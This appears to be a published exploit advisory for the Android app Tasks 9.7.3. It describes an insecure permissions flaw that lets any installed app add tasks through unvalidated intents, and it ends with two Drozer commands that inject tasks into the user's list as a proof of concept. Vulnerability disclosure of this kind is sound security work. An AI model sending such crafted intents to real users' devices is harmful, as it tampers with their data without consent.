20 lines
No EOL
1.4 KiB
Text
20 lines
No EOL
1.4 KiB
Text
# Exploit Title: Tasks 9.7.3 - Insecure Permissions
|
|
# Date: 18th of July, 2020
|
|
# Exploit Author: Lyhin's Lab
|
|
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/
|
|
# Vendor Homepage: https://tasks.org/
|
|
# Software Link: https://github.com/tasks/tasks
|
|
# Version: 9.7.3
|
|
# Tested on: Android 9
|
|
|
|
Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling.
|
|
A malicious application has several ways of how to achieve that:
|
|
|
|
1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested "task" to the user's task list.
|
|
|
|
2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list.
|
|
|
|
We used the Drozer application to emulate malicious app activity. Please find the commands below.
|
|
|
|
run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa"
|
|
run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org" |